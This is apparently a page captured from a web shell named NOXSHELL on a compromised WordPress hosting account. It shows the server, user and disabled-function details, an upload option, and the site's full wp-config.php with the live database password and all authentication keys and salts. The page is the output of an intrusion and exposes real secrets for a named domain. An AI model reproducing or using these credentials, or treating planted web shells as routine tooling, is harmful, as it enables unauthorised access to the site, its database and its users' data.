NOXSHELL
Server: LiteSpeed
System: Linux br-asc-web1432.main-hosting.eu 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
User: u728655182 (728655182)
PHP: 8.1.33
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: /home/u728655182/domains/chasquisrl.com.ar/public_html/wp-config.php
<?php

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * Localized language
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'u728655182_KjpzZ' );

/** Database username */
define( 'DB_USER', 'u728655182_TZVMu' );

/** Database password */
define( 'DB_PASSWORD', 'kGTHfu3p8W' );

/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          'ypmS(NGB/%=6%$3q{!g@zI5qE~1eFKu5f1jjCN/TU6Q_xg#>VqVkxs9[BJB@$q:(' );
define( 'SECURE_AUTH_KEY',   '-2I?ioY@@A>=wsi:9S9s.tJ.5xWfQ8Cah5py@srdMXc0<)|)Q}b2d]^%`j1`@Q$#' );
define( 'LOGGED_IN_KEY',     'f5XJ5HOT%th_f>`d6U<.$si0g.Ls!dI_PF71xg]W^FE<JCR1K@&L}<(B2y&jx,O0' );
define( 'NONCE_KEY',         '#4rmk1&hdhmDIs&!2P2$P<0<Bkm;`GR;)$O=]}+/Xfgdo(D7gCHvpuSMo!eEpny|' );
define( 'AUTH_SALT',         'eAEd_WnnMNfFA(3{~s-mR~`g mQAD]Rj[wJYASH|2/6YN8k%h!_P enrw.dsFP-0' );
define( 'SECURE_AUTH_SALT',  'tkzUgN!P!{Kk]1x`~{D:uQ 4k<slT0=f/*W;p()h .l&?vDP)wl3 |ARc{0ax7-5' );
define( 'LOGGED_IN_SALT',    'gY=Y-lnXm(c?GRI*6u^c?|/2v83mVl0c%p&DCjDML6f0g=2Rk<rl#)sd HP3WytH' );
define( 'NONCE_SALT',        '$JXc~0G_R.M>glC&Iz:#Ww#afWc.:fN/W,a59p&b7sW5oIh<mt$,Y8uemJQ V!?p' );
define( 'WP_CACHE_KEY_SALT', ',r+N-7$}n83M&2<$OHLBK.Z 2uaBS<QD8M73^}/8JoR]XzS$QaRq:$@jo27BLTe_' );


/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';


/* Add any custom values between this line and the "stop editing" line. */



/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
if ( ! defined( 'WP_DEBUG' ) ) {
	define( 'WP_DEBUG', false );
}

define( 'FS_METHOD', 'direct' );
define( 'COOKIEHASH', '2c4e3fc68386a042d2144d7fae88f993' );
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';